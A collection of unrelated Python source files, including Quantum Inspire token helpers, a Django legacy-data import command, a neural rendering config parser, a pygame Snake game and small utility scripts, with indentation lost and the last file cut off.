.. autofunction:: enable_account
.. autofunction:: get_token_authentication
.. autofunction:: get_basic_authentication
"""
import warnings
import os
import json
from typing import Optional
from coreapi.auth import BasicAuthentication, TokenAuthentication
DEFAULT_QIRC_FILE = os.path.join(os.path.expanduser("~"), '.quantuminspire', 'qirc')
def load_account(filename: str = DEFAULT_QIRC_FILE) -> Optional[str]:
""" Try to load an earlier stored Quantum Inspire token from file or environment.
Load the token when found. This method looks for the token in two locations, in the following order:
1. In the environment variable (:envvar:`QI_TOKEN`).
2. In the file with `filename` given or, when not given, the default resource file
:file:`.quantuminspire/qirc` in the user's home directory.
:param filename: full path to the resource file. If no `filename` is given, the default resource file
:file:`.quantuminspire/qirc` in the user's home directory is used.
:return:
The Quantum Inspire token or None when no token is found.
"""
token = os.environ.get('QI_TOKEN', None) or read_account(filename)
return token
def read_account(filename: str = DEFAULT_QIRC_FILE) -> Optional[str]:
""" Try to read an earlier stored Quantum Inspire token from file.
his method looks for the token in the file with `filename` given or,
when no `filename` is given, the default resource file :file:`.quantuminspire/qirc` in the user's home directory.
:param filename: full path to the resource file. If no filename is given, the default resource file
:file:`.quantuminspire/qirc` in the user's home directory is used.
:return:
The Quantum Inspire token or None when no token is found or token is empty.
"""
try:
with open(filename, 'r') as file:
accounts = json.load(file)
token: Optional[str] = accounts['token']
except (OSError, KeyError, ValueError): # file does not exist or is empty/invalid
token = None
return token if token else None
def store_account(token: str, filename: str = DEFAULT_QIRC_FILE, overwrite: bool = False) -> None:
"""Store the token in a resource file.
Replace an existing token only when overwrite=True.
:param token: the Quantum Inspire token to store to disk.
:param filename: full path to the resource file. If no `filename` is given, the default resource file
:file:`.quantuminspire/qirc` in the user's home directory is used.
:param overwrite: overwrite an existing token.
"""
stored_token = read_account(filename)
if stored_token and stored_token != token and not overwrite:
warnings.warn('Token already present. Set overwrite=True to overwrite.')
return
save_account(token, filename)
def delete_account(token: str, filename: str = DEFAULT_QIRC_FILE) -> None:
"""Remove the token from the resource file.
:param token: the Quantum Inspire token to remove.
:param filename: full path to the resource file. If no `filename` is given, the default resource file
:file:`.quantuminspire/qirc` in the user's home directory is used.
"""
stored_token = read_account(filename)
if stored_token == token:
save_account('', filename)
def save_account(token: str, filename: str = DEFAULT_QIRC_FILE) -> None:
"""Save the token to a file.
Save the token to the file with `filename` given, otherwise save to the default resource file.
An existing token is overwritten. Use :meth:`~.store_account` to prevent overwriting an existing token.
:param token: the Quantum Inspire token to save.
:param filename: full path to the resource file. If no `filename` is given, the default resource file
:file:`.quantuminspire/qirc` in the user's home directory is used.
"""
accounts = {'token': token}
os.makedirs(os.path.dirname(filename), exist_ok=True)
with open(filename, 'w') as config_file:
json.dump(accounts, config_file, indent=2)
def enable_account(token: str) -> None:
"""Save the token to the internal environment, that will be used by load_account for the session.
When a token was already loaded from the system environment it is overwritten.
The system environment is not effected.
:param token: the Quantum Inspire token to be used by :meth:`~.load_account` for the session.
"""
os.environ['QI_TOKEN'] = token
def get_token_authentication(token: Optional[str] = None) -> TokenAuthentication:
"""Set up token authentication for Quantum Inspire to be used in the API.
:param token: the Quantum Inspire token to set in TokenAuthentication. When no token is given,
the token returned from :meth:`~.load_account` is used.
:return:
The token authentication for Quantum Inspire.
"""
if not token:
token = load_account()
return TokenAuthentication(token, scheme="token")
def get_basic_authentication(email: str, password: str) -> BasicAuthentication:
"""Set up basic authentication for Quantum Inspire to be used in the API.
:param email: a valid email address.
:param password: password for the account.
:return:
The basic authentication for Quantum Inspire.
"""
return BasicAuthentication(email, password)
|
import sqlite3
from django.contrib.auth.models import Group
from django.core.management.base import BaseCommand
from django.db import transaction
from django.utils.dateparse import parse_date
from apps.accounts.models import User
from apps.thesis.models import Thesis, Category
class Command(BaseCommand):
help = "Loads legacy data."
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._conn = None
self._student_group = Group.objects.get_or_create(name='student')[0]
self._teacher_group = Group.objects.get_or_create(name='teacher')[0]
def add_arguments(self, parser):
parser.add_argument('file')
@transaction.atomic
def handle(self, *args, **options):
self._conn = sqlite3.connect(options.get('file'))
self._conn.row_factory = sqlite3.Row
r = self._conn.execute("""
SELECT k.*,
o.jmeno as o_jmeno,
v.jmeno as v_jmeno
FROM knihy k
inner join oponenti o ON k.oponent = o.id
inner join oponenti v ON k.vedouci = v.id
order by k.ID;
""")
# ['ID', 'ev_cislo', 'prace', 'ajmeno', 'vedouci', 'oponent', 'edatum', 'rok', 'typ', 'datumpridani', 'trida', 'souhlas', 'stav', 'abstrakt']
# [152, 'S156', 'Syndrom CAN', 'And Klára ', 30, 1, '2015-04-13', '2012-04-01', 'SL', '2015-04-13',
# 'L4', 1, 'Dostupná', None]
for row in r.fetchall(): # type: sqlite3.Row
if Thesis.objects.filter(registration_number=row['ev_cislo']).exists():
continue
print(tuple(row))
t = Thesis(
registration_number=row['ev_cislo'],
title=row['prace'],
category=Category.objects.get_or_create(title=row['typ'])[0],
published_at=parse_date(row['rok']),
reservable=str(row['souhlas']) == '1',
state=Thesis.State.PUBLISHED,
note=dict(imported_from=tuple(row))
)
t.supervisor = User.objects.get_or_create_from_name(name=row['v_jmeno'], thesis_id=None)[0]
t.opponent = User.objects.get_or_create_from_name(name=row['o_jmeno'], thesis_id=None)[0]
t.opponent and self._teacher_group.user_set.add(t.opponent)
t.supervisor and self._teacher_group.user_set.add(t.supervisor)
for name in row['ajmeno'].split(','):
author = User.objects.get_or_create_from_name(name=name, thesis_id=row['ID'])[0]
author.school_class = row['trida']
self._student_group.user_set.add(author)
t.authors.add(author)
author.save(update_fields=['school_class'])
t.save()
self._teacher_group.save()
self._student_group.save()
self._fix_wrong_users()
def _fix_wrong_users(self):
for user in User.objects.filter(first_name__iregex=r'(Ing|Mgr)\.'):
try:
correct = User.objects.exclude(id=user.id).exclude(
first_name__contains='.',
).get(
groups=self._teacher_group,
last_name=user.last_name,
)
except User.MultipleObjectsReturned:
print('Cannot fix, multiple targets', user)
continue
except User.DoesNotExist:
print('Cannot fix, not found correct', user)
continue
Thesis.objects.filter(opponent=user).update(opponent=correct)
Thesis.objects.filter(supervisor=user).update(supervisor=correct)
user.groups.set([])
user.delete()
|
from context import openrefine_wrench
wanted = {
"columnWidths": None,
"encoding": "UTF-8",
"guessCellValueTypes": False,
"headerLines": None,
"header_lines": 1,
"ignoreLines": None,
"ignore_lines": -1,
"includeFileSources": False,
"limit": -1,
"linesPerRow": None,
"processQuotes": True,
"projectName": None,
"projectTags": None,
"recordPath": None,
"separator": "#",
"sheets": None,
"skipDataLines": None,
"skip_data_lines": 0,
"storeBlankCellsAsNulls": True,
"storeBlankRows": True,
"storeEmptyStrings": True,
"trimStrings": False}
def test_prep_options():
options = openrefine_wrench._prep_options(
source_format="csv",
record_path=None,
columns_separator=",",
encoding=None,
custom_options='{"encoding": "UTF-8", "separator": "#"}')
assert options == wanted
|
import configargparse
def config_parser():
## Base experiment config
parser = configargparse.ArgumentParser()
parser.add_argument('--config', is_config_file=True,
help='config file path')
parser.add_argument("--expname", type=str, help='experiment name')
parser.add_argument("--basedir", type=str, default='./logs/',
help='where to store ckpts and logs')
parser.add_argument("--datadir", type=str,
default='/data/unrolled/datasets/hypersim', help='input data directory')
parser.add_argument("--dataset_type", type=str, default='hypersim',
help='options: llff / blender / deepvoxels')
parser.add_argument("--scan", type=str, default='ai_001_001',
help='num views to use')
## Auxiliary
parser.add_argument("--show_images", action='store_true',
help='Show images before training')
parser.add_argument("--depth_splat", action='store_true',
help='Depth splat visualization before training')
parser.add_argument("--eval_only", action='store_true',
help='Only eval')
parser.add_argument("--render_freezeframe", action='store_true',
help='Render freezeframe outputs')
parser.add_argument("--render_only", action='store_true',
help='Only perform render')
parser.add_argument("--focus_distance", type=float, default=-1.0,
help='Focus distance for rendering')
parser.add_argument("--rad_multiplier_x", type=float, default=1.0,
help='Radius multiplier for spiral')
parser.add_argument("--rad_multiplier_y", type=float, default=1.0,
help='Radius multiplier for spiral')
parser.add_argument("--rad_multiplier_z", type=float, default=1.0,
help='Radius multiplier for spiral')
parser.add_argument("--tof_image_width", type=int, default=512,
help='Image width')
parser.add_argument("--tof_image_height", type=int, default=512,
help='Image height')
parser.add_argument("--color_image_width", type=int, default=512,
help='Image width')
parser.add_argument("--color_image_height", type=int, default=512,
help='Image height')
## Training options
parser.add_argument("--N_iters", type=int, default=100000,
help='Number of optimization iters')
parser.add_argument("--N_rand", type=int, default=32*32*4,
help='batch size (number of random rays per gradient step)')
parser.add_argument("--lrate", type=float,
default=5e-4, help='learning rate')
parser.add_argument("--lrate_calib", type=float,
default=1e-3, help='learning rate')
parser.add_argument("--lrate_calib_fac", type=float,
default=0.5, help='learning rate')
parser.add_argument("--lrate_decay", type=int, default=250,
help='exponential learning rate decay (in 1000s)')
parser.add_argument("--lrate_decay_calib", type=int, default=150,
help='exponential learning rate decay (in 1000s)')
parser.add_argument("--chunk", type=int, default=1024*32,
help='number of rays processed in parallel, decrease if running out of memory')
parser.add_argument("--netchunk", type=int, default=1024*64,
help='number of pts sent through network in parallel, decrease if running out of memory')
parser.add_argument("--no_batching", action='store_true',
help='only take random rays from 1 image at a time')
parser.add_argument("--no_reload", action='store_true',
help='do not reload weights from saved ckpt')
parser.add_argument("--ft_path", type=str, default=None,
help='specific weights npy file to reload for coarse network')
parser.add_argument("--random_seed", type=int, default=None,
help='fix random seed for repeatability')
parser.add_argument("--num_views", type=int, default=16,
help='Num views to use')
parser.add_argument("--total_num_views", type=int, default=200,
help='Total number of views in dataset')
parser.add_argument("--view_step", type=int, default=1,
help='Training view step')
parser.add_argument("--view_start", type=int, default=0,
help='Training view start')
parser.add_argument("--val_start", type=int, default=61,
help='Validation view index start')
parser.add_argument("--val_end", type=int, default=122,
help='Validation view index end')
parser.add_argument("--optimize_poses", action='store_true',
help='Optimize poses')
parser.add_argument("--optimize_relative_pose", action='store_true',
help='Optimize relative pose')
parser.add_argument("--optimize_phase_offset", action='store_true',
help='Optimize phase offset')
parser.add_argument("--noisy_pose_initialization", action='store_true',
help='Noisy initialization for poses')
parser.add_argument("--identity_pose_initialization", action='store_true',
help='Identity initialization for poses')
parser.add_argument("--use_relative_poses", action='store_true',
help='Use relative poses')
parser.add_argument("--collocated_pose", action='store_true',
help='Colocated source and camera')
parser.add_argument("--use_depth_loss", action='store_true',
help='Use direct depth loss')
parser.add_argument("--depth_weight", type=float, default=0.0,
help='Direct depth loss weight')
parser.add_argument("--depth_weight_decay", type=float, default=1.0,
help='Decay for depth weight')
parser.add_argument("--depth_weight_decay_steps", type=int, default=30,
help='Apply depth weight decay after this many steps')
parser.add_argument("--sparsity_weight", type=float, default=0.0,
help='Weight for loss encouraging sparsity')
parser.add_argument("--sparsity_weight_decay", type=float, default=1.0,
help='Decay for sparsity weight')
parser.add_argument("--sparsity_weight_decay_steps", type=int, default=30,
help='Apply sparsity weight decay after this many steps')
parser.add_argument("--train_both", action='store_true',
help='Train color and ToF separately')
parser.add_argument("--no_phase_calib_iters", type=int, default=5000,
help='Iters before adding phase look u p table optimization')
parser.add_argument("--no_phase_iters", type=int, default=1000000,
help='Iters before adding phase bias prediction')
parser.add_argument("--no_color_iters", type=int, default=0,
help='Iters before color loss optimization')
parser.add_argument("--calibration_pretraining", action='store_true',
help='Use calibration (static scene) pretraining')
parser.add_argument("--reset_static_model", action='store_true',
help='Reset static model after static pre-training')
parser.add_argument("--color_weight", type=float, default=1.0,
help='Color loss weight')
parser.add_argument("--pose_reg_weight", type=float, default=0.0,
help='Pose regularization loss weight')
parser.add_argument("--tof_weight", type=float, default=1.0,
help='ToF loss weight')
parser.add_argument("--tof_weight_decay", type=float, default=1.0,
help='ToF weight decay multiplier')
parser.add_argument("--tof_weight_decay_steps", type=int, default=30,
help='How many steps before ToF weight decay')
## Network architecture
parser.add_argument("--dynamic", action='store_true',
help='Optimize a dynamic scene representation')
parser.add_argument("--single_dynamic_model", action='store_true',
help='Single model for both static and dynamic content')
parser.add_argument("--fix_view", action='store_true',
help='Assume a fixed view')
parser.add_argument("--latent_code_size", type=int, default=256,
help='size of render feature vector')
parser.add_argument("--num_frames", type=int, default=8,
help='Number of frames in sequence')
parser.add_argument("--model_reset_iters", type=int, default=0,
help='How many iters before model reset')
parser.add_argument("--static_scene_iters", type=int, default=0,
help='How many iters to optimize static scene')
parser.add_argument("--use_static_loss", action='store_true',
help='Static scene loss')
parser.add_argument("--find_visible", action='store_true',
help='Do not render content outside of view for a given time step (expensive)')
parser.add_argument("--tofnetdepth", type=int, default=4,
help='layers in network')
parser.add_argument("--tofnetwidth", type=int, default=64,
help='channels per layer')
parser.add_argument("--tofnetdepth_fine", type=int,
default=8, help='layers in fine network')
parser.add_argument("--tofnetwidth_fine", type=int, default=64,
help='channels per layer in fine network')
parser.add_argument("--phasenetdepth", type=int, default=4,
help='Net depth for look up table model')
parser.add_argument("--phasenetwidth", type=int, default=128,
help='Net width for look up table model')
parser.add_argument("--colornetdepth", type=int, default=4,
help='layers in network')
parser.add_argument("--colornetwidth", type=int, default=64,
help='channels per layer')
parser.add_argument("--colornetdepth_fine", type=int,
default=8, help='layers in fine network')
parser.add_argument("--colornetwidth_fine", type=int, default=64,
help='channels per layer in fine network')
parser.add_argument("--netdepth", type=int, default=8,
help='layers in network')
parser.add_argument("--netwidth", type=int, default=256,
help='channels per layer')
parser.add_argument("--netdepth_fine", type=int,
default=8, help='layers in fine network')
parser.add_argument("--netwidth_fine", type=int, default=256,
help='channels per layer in fine network')
## Rendering options
parser.add_argument("--N_samples", type=int, default=64,
help='number of coarse samples per ray')
parser.add_argument("--N_shadow_samples", type=int, default=64,
help='number of coarse samples per ray')
parser.add_argument("--N_depth_samples", type=int, default=16,
help='number of coarse samples per ray')
parser.add_argument("--N_importance", type=int, default=0,
help='number of additional fine samples per ray')
parser.add_argument("--perturb", type=float, default=1.,
help='set to 0. for no jitter, 1. for jitter')
parser.add_argument("--use_viewdirs", action='store_true',
help='use full 5D input instead of 3D')
parser.add_argument("--i_embed", type=int, default=0,
help='set 0 for default positional encoding, -1 for none')
parser.add_argument("--multires", type=int, default=10,
help='log2 of max freq for positional encoding (3D location)')
parser.add_argument("--multires_views", type=int, default=4,
help='log2 of max freq for positional encoding (2D direction)')
parser.add_argument("--multires_pix", type=int, default=2,
help='log2 of max freq for positional encoding (2D direction) for phase look up table model')
parser.add_argument("--raw_noise_std", type=float, default=0.,
help='std dev of noise added to regularize sigma_a output, 1e0 recommended')
parser.add_argument("--render_test", action='store_true',
help='render the test set instead of render_poses path')
parser.add_argument("--render_factor", type=int, default=0,
help='downsampling factor to speed up rendering, set 4 or 8 for fast preview')
# Importance sampling
parser.add_argument("--use_importance_sampling", action='store_true',
help='Use error importance sampling for training')
parser.add_argument("--importance_sampling_start", type=int, default=20000,
help='When to start importance sampling')
parser.add_argument("--importance_sampling_interval", type=int, default=10000,
help='')
parser.add_argument("--importance_sampling_freq", type=int, default=2,
help='How often to importance sample')
# Depth sampling
parser.add_argument("--use_depth_sampling", action='store_true',
help='Sample about ground truth depth')
parser.add_argument("--depth_sampling_exclude_interval", type=int, default=1,
help='No depth sampling every X iterations')
parser.add_argument("--depth_sampling_range", type=float, default=0.1,
help='depth range for tof camera')
parser.add_argument("--base_uncertainty", type=float, default=1e-5,
help='Base uncertainty for sampling')
parser.add_argument("--depth_sampling_range_min", type=float,
default=0.1, help='minimum depth sampling range')
# ToF rendering
parser.add_argument("--square_transmittance", action='store_true',
help='Square transmittance for forward model')
parser.add_argument("--use_falloff", action='store_true',
help='Use r^2 falloff')
parser.add_argument("--use_phasor", action='store_true',
help='Phasor output for ToF model')
parser.add_argument("--use_phase_calib", action='store_true',
help='Use phase look up table MLP')
parser.add_argument("--use_tof_uncertainty", action='store_true',
help='Use tof albedo for coarse sampling')
parser.add_argument("--use_variance_weighting", action='store_true',
help='Use variance weighted loss')
parser.add_argument("--bias_range", type=float, default=50.,
help='When the model regresses phase bias, this sets the bias range')
parser.add_argument("--phase_offset", type=float, default=0.,
help='Base phase offset for ToF phase')
parser.add_argument("--depth_range", type=float, default=-1.,
help='depth range for tof camera')
parser.add_argument("--min_depth_fac", type=float, default=0.01,
help='Used to calculate sampling range for ToF datasets')
parser.add_argument("--max_depth_fac", type=float, default=1.0,
help='Used to calculate sampling range for ToF datasets')
parser.add_argument("--scene_scale", type=float, default=1.,
help='Scene scale')
parser.add_argument("--scene_scale_x", type=float, default=2.,
help='Scene scale multiplier x direction')
parser.add_argument("--scene_scale_y", type=float, default=2.,
help='Scene scale multiplier y direction')
parser.add_argument("--falloff_range", type=float, default=16.,
help='Falloff range')
## Dataset options
parser.add_argument("--testskip", type=int, default=8,
help='will load 1/N images from test/val sets, useful for large datasets like deepvoxels')
parser.add_argument("--tof_scale_factor", type=float, default=1.0,
help='downsample factor for images')
parser.add_argument("--color_scale_factor", type=float, default=1.0,
help='downsample factor for images')
parser.add_argument("--no_ndc", action='store_true',
help='do not use normalized device coordinates (set for non-forward facing scenes)')
parser.add_argument("--lindisp", action='store_true',
help='sampling linearly in disparity rather than depth')
parser.add_argument("--spherify", action='store_true',
help='set for spherical 360 scenes')
parser.add_argument("--autoholdout", type=int, default=8,
help='will take every 1/N images as LLFF test set, paper uses 8')
parser.add_argument("--train_views", type=str, default="",
help='Views to use for training')
parser.add_argument("--render_extrinsics_file", type=str, default="",
help='File to load render extrinsics from')
parser.add_argument("--render_extrinsics_scale", type=float, default=1.1,
help='Scale render extrinsics (if loaded from file)')
parser.add_argument("--reverse_render_extrinsics", action='store_true',
help='Reverse order of render extrinsics')
parser.add_argument("--val_split_file", type=str, default="",
help='will take every 1/N images as LLFF test set, paper uses 8')
# Blender flags
parser.add_argument("--white_bkgd", action='store_true',
help='set to render synthetic data on a white bkgd (always use for dvoxels)')
parser.add_argument("--half_res", action='store_true',
help='load blender synthetic data at 400x400 instead of 800x800')
parser.add_argument("--static_blend_weight", action='store_true',
help='use static blending weight')
## Logging / saving options
parser.add_argument("--print_extras", action='store_true',
help='Print extra variables')
parser.add_argument("--i_print", type=int, default=100,
help='frequency of console printout and metric logging')
parser.add_argument("--i_img", type=int, default=500,
help='frequency of tensorboard image logging')
parser.add_argument("--i_testset", type=int, default=1000,
help='frequency of testset saving')
parser.add_argument("--i_save", type=int, default=10000,
help='frequency of weight ckpt saving')
parser.add_argument("--i_video", type=int, default=50000,
help='frequency of render_poses video saving')
return parser
|
from nanopore.mappers.abstractMapper import AbstractMapper
from nanopore.mappers.last import Last
from sonLib.bioio import system, fastaRead, fastqRead, fastaWrite
import os
class LastParams(Last):
def run(self):
Last.run(self, params="-s 2 -T 0 -Q 0 -a 1")
class LastParamsChain(LastParams):
def run(self):
LastParams.run(self)
self.chainSamFile()
class LastParamsRealign(LastParams):
def run(self):
LastParams.run(self)
self.realignSamFile()
class LastParamsRealignEm(LastParams):
def run(self):
LastParams.run(self)
self.realignSamFile(doEm=True, gapGamma=0.5, matchGamma=0.0)
class LastParamsRealignTrainedModel(LastParams):
def run(self):
LastParams.run(self)
self.realignSamFile(useTrainedModel=True)
class LastParamsRealignTrainedModel20(LastParams):
def run(self):
LastParams.run(self)
self.realignSamFile(useTrainedModel=True, trainedModelFile="blasr_hmm_20.txt")
class LastParamsRealignTrainedModel40(LastParams):
def run(self):
LastParams.run(self)
self.realignSamFile(useTrainedModel=True, trainedModelFile="blasr_hmm_40.txt")
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import six
import abc
import logging
from iam import Action, MultiActionRequest
logger = logging.getLogger("iam")
@six.add_metaclass(abc.ABCMeta)
class IAMResourceHelper(object):
def __init__(self, iam, system, actions):
self.iam = iam
self.system = system
self.actions = actions
@abc.abstractmethod
def get_resources(self, bundle):
raise NotImplementedError()
@abc.abstractmethod
def get_resources_id(self, bundle):
raise NotImplementedError()
@abc.abstractmethod
def get_subject_for_alter_list(self, request, data):
raise NotImplementedError()
@abc.abstractmethod
def get_environment_for_alter_list(self, request, data):
raise NotImplementedError()
@abc.abstractmethod
def get_subject_for_alter_detail(self, request, data):
raise NotImplementedError()
@abc.abstractmethod
def get_environment_for_alter_detail(self, request, data):
raise NotImplementedError()
class IAMResourceMixin(object):
def alter_list_data_to_serialize(self, request, data):
helper = getattr(self._meta, "iam_resource_helper", None)
if not helper:
return data
# 1. collect resources
resources_list = []
for bundle in data["objects"]:
resources_list.append(helper.get_resources(bundle))
if not resources_list:
return data
# 2. make request
request = MultiActionRequest(
helper.system,
helper.get_subject_for_alter_list(request, data),
[Action(action) for action in helper.actions],
[],
helper.get_environment_for_alter_list(request, data),
)
resource_actions_allowed = helper.iam.batch_resource_multi_actions_allowed(request, resources_list)
logger.debug(
"tastypie alter_list_data_to_serialize batch_resource_multi_actions_allowed request({}) result: {}".format(
request.to_dict(), resource_actions_allowed
)
)
# 3. assemble action allowed data
for bundle in data["objects"]:
rid = str(helper.get_resources_id(bundle))
bundle.data["auth_actions"] = [
action for action, allowed in resource_actions_allowed.get(rid, {}).items() if allowed
]
return data
def alter_detail_data_to_serialize(self, request, data):
helper = getattr(self._meta, "iam_resource_helper", None)
if not helper:
return data
bundle = data
# 1. get resources
resources = helper.get_resources(bundle)
# 2. make request
request = MultiActionRequest(
helper.system,
helper.get_subject_for_alter_detail(request, data),
[Action(action) for action in helper.actions],
resources,
helper.get_environment_for_alter_detail(request, data),
)
actions_allowed = helper.iam.resource_multi_actions_allowed(request)
logger.debug(
"tastypie alter_detail_data_to_serialize resource_multi_actions_allowed request({}) result: {}".format(
request.to_dict(), actions_allowed
)
)
# 3. assemble action allowed data
bundle.data["auth_actions"] = [action for action, allowed in actions_allowed.items() if allowed]
return data
|
import numpy as np
from sklearn.metrics import average_precision_score
def load_data(data_path):
"""load array data from data_path"""
data = np.load(data_path)
return data['X_train'], data['y_train'], data['X_test'], data['y_test']
def calculate_average_precision(label, index, similarity, num_search_sample):
"""calculate average precision of similar search result.
The average precison is calculated over num_search_sample
"""
label_idx = np.array([label[idx] for idx in index])
label_idx_true = np.array([np.where(row == row[0], 1, 0) for row in label_idx])
label_idx_true = label_idx_true[:, 1:]
ap = []
for i in range(num_search_sample):
ap.append(average_precision_score(label_idx_true[i], similarity[i]))
return ap
|
from random import randrange
from time import sleep
import pygame
import sys
try:
pygame.init()
except:
print('\033[31mJogo nao pode ser inicializado nessa maquina :(')
# Cores
white = (255, 255, 255)
red = (255, 0, 0)
green = (0, 255, 0)
blue = (0, 0, 255)
black = (0, 0, 0)
# Configuracoes da tela
info = pygame.display.Info() # Obtem as informacoes necessarias da tela
largura, altura = 600, 400
janela = [largura, altura]
background = black
tela = pygame.display.set_mode([largura, altura])
tela.fill(background)
pygame.display.set_caption('Snake')
time = pygame.time.Clock()
# Configuracoes da cobra
tamanho = 10
pos_x = randrange(0, largura - tamanho, 10)
pos_y = randrange(0, altura - tamanho, 10)
velocidade_x = 0
velocidade_y = 0
cobraXY = []
cobracomp = 1
# Configuracoes da maca
tamanho = 10
maca_x = randrange(0, largura - tamanho, 10)
maca_y = randrange(0, altura - tamanho, 10)
# LOOPS DO JOGO
gameover = False
def texto(msg, cor, x, y, tam=20):
"""Escreve uma mensagem na tela."""
font = pygame.font.SysFont(None, tam)
txt = font.render(msg, True, cor)
tela.blit(txt, [x, y])
def menu_inicial():
"""Menu inicial"""
tamx = 200
tamy = 50
x = 200
y = 100
# Iniciar
pygame.draw.rect(tela, white, [x, y, tamx, tamy])
texto('INICIAR JOGO', green, x + 30, y + 20, 30)
#####################################################
y += 100
# Sair
pygame.draw.rect(tela, white, [x, y, tamx, tamy])
texto('SAIR', green, x + 70, y + 20, 30)
# Eventos na tela inicial
if eventos_tela_inicial():
return True
else:
return False
def eventos_tela_inicial():
"""Responde aos eventos na tela inicial."""
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit(' :( ')
if event.type == pygame.MOUSEBUTTONDOWN:
x = pygame.mouse.get_pos()[0]
y = pygame.mouse.get_pos()[1]
if 200 < x < 400 and 100 < y < 150:
print('iniciar')
pygame.mouse.set_visible(False)
return True
elif 200 < x < 400 and y > 200 and y < 250:
print('sair')
pygame.mouse.set_visible(False)
sys.exit()
def checa_eventos():
"""Responde aos eventos da tela."""
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit(' :) ')
if event.type == pygame.KEYDOWN:
cobra_eventos(event)
def cobra():
"""Desenha a cobra na tela."""
global pos_x, pos_y, cobraXY, cobracomp, gameover
pos_x += velocidade_x
pos_y += velocidade_y
for XY in cobraXY:
pygame.draw.rect(tela, green, [XY[0], XY[1], tamanho, tamanho])
# Controlando as bordas
if pos_x + tamanho > largura:
pos_x = 0 - tamanho
elif pos_x < 0:
pos_x = largura - tamanho
if pos_y + tamanho > altura:
pos_y = 0 - tamanho
elif pos_y < 0:
pos_y = altura - tamanho
# Crescimento da snake
global cobra_inicio
cobra_inicio = []
cobra_inicio.append(pos_x)
cobra_inicio.append(pos_y)
cobraXY.append(cobra_inicio)
if len(cobraXY) > cobracomp:
del cobraXY[0]
turn = 0
def cobra_eventos(event):
"""Responde aos eventos da cobra."""
global pos_x, pos_y, velocidade_x, velocidade_y, cobracomp, turn
if event.key == pygame.K_UP and velocidade_y != tamanho:
velocidade_x = 0
velocidade_y = -tamanho
# hack
if turn == 0:
cobracomp += 1
turn = 1
elif event.key == pygame.K_DOWN and velocidade_y != -tamanho:
velocidade_x = 0
velocidade_y = tamanho
# hack
if turn == 0:
cobracomp += 1
turn = 1
if event.key == pygame.K_RIGHT and velocidade_x != -tamanho:
velocidade_y = 0
velocidade_x = tamanho
# hack
if turn == 0:
cobracomp += 1
turn = 1
elif event.key == pygame.K_LEFT and velocidade_x != tamanho:
velocidade_y = 0
velocidade_x = -tamanho
# hack
if turn == 0:
cobracomp += 1
turn = 1
def colisao():
"""Responde a colisao da snake com a snake"""
global cobra_inicio, pos_x, pos_y
# Controlando as bordas
"""
if pos_x > largura:
return False
elif pos_x < 0:
return False
if pos_y > altura:
return False
elif pos_y < 0:
return False
"""
if any(bloco == cobra_inicio for bloco in cobraXY[:-1]):
print('game over')
sleep(0.2)
return False
else:
return True
def maca():
"""Desenha a maca na tela."""
global maca_x, maca_y
pygame.draw.rect(tela, red, [maca_x, maca_y, tamanho, tamanho])
def pontos():
"""Responde a colisoes."""
# Colisao da snake e maca
global pos_x, pos_y, maca_x, maca_y, cobracomp
if pos_x == maca_x and pos_y == maca_y:
maca_x = randrange(0, largura - tamanho, 10)
maca_y = randrange(0, altura - tamanho, 10)
cobracomp += 1
def pontuacao():
"""Faz a contagem da pontuacao"""
texto(f'{cobracomp - 1}', white, largura - 50, 10, 40)
def menu_final():
"""Menu final"""
tela.fill(background)
texto('GAME OVER', red, largura / 3, 10, 50)
# Reiniciar
pygame.draw.rect(tela, white, [50, 200, 200, 50])
texto('REINICIAR', green, 100, 215, 30)
# Sair
pygame.draw.rect(tela, white, [350, 200, 200, 50])
texto('SAIR', green, 425, 215, 30)
# Pontuacao
texto(f'{cobracomp} POINTS', blue, largura / 3 + 50, 100, 30)
# Eventos na tela inicial
if eventos_tela_final():
return True
else:
return False
def eventos_tela_final():
"""Responde aos eventos na tela inicial."""
pygame.mouse.set_visible(True)
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit(' :( ')
if event.type == pygame.MOUSEBUTTONDOWN:
x = pygame.mouse.get_pos()[0]
y = pygame.mouse.get_pos()[1]
if 50 < x < 250 and 200 < y < 250:
print('reiniciar')
redifine()
pygame.mouse.set_visible(False)
return True
elif 350 < x < 550 and 200 < y < 250:
print('sair')
pygame.mouse.set_visible(False)
sys.exit()
def redifine():
"""Redifine o jogo pra iniciar."""
global pos_x, pos_y, \
maca_x, maca_y, \
velocidade_x, velocidade_y, \
cobraXY, cobracomp, \
turn, gameover
# Configuracoes da cobra
tamanho = 10
pos_x = randrange(0, largura - tamanho, 10)
pos_y = randrange(0, altura - tamanho, 10)
velocidade_x = 0
velocidade_y = 0
cobraXY = []
cobracomp = 1
# Configuracoes da maca
tamanho = 10
maca_x = randrange(0, largura - tamanho, 10)
maca_y = randrange(0, altura - tamanho, 10)
# LOOPS DO JOGO
turn = 0
gameover = False
|
filename = 'hex.txt'
def main(filename):
i = 0
with open(filename, "r") as f:
for line in f:
translate(line, i)
i = i + 1
def translate(hex, inc):
r = hex[:2]
g = hex[2:4]
b = hex[4:]
'''print(r+g+b)'''
r = str(hexToDecimal(r))
g = str(hexToDecimal(g))
b = str(hexToDecimal(b))
print('new int[]{255,' + r + ',' + g + ',' + b + ','+ str(inc) +'},')
def hexToDecimal(hexNum):
return int(hexNum, 16)
main(filename)
|
#!/usr/bin/env python3
import requests
filename = 'test.pdf'
container = 'attachments'
# Data
endpoint = 'azure logic app url'
payload = {
"to": 'change@me.com',
"subject": 'Testing in progress',
"body": "This is email body of test email!",
"file_name": filename,
"file_path": f'/{container}/{filename}',
}
# HTTP POST request
resp = requests.post(endpoint, json=payload)
print('response', resp.status_code)
|
import os
import subprocess
from fire import Fire
def shell(command):
'''Execute bash commands'''
if isinstance(command, str):
command = [command]
[subprocess.call([c], shell=True) for c in command]
def html(pelican='pelicanconf.py', output='output', content='content', theme='theme'):
'''Build website artifacts'''
shell(f'pelican -s {pelican} -o {output} -t {theme} {content}')
def local(output='output'):
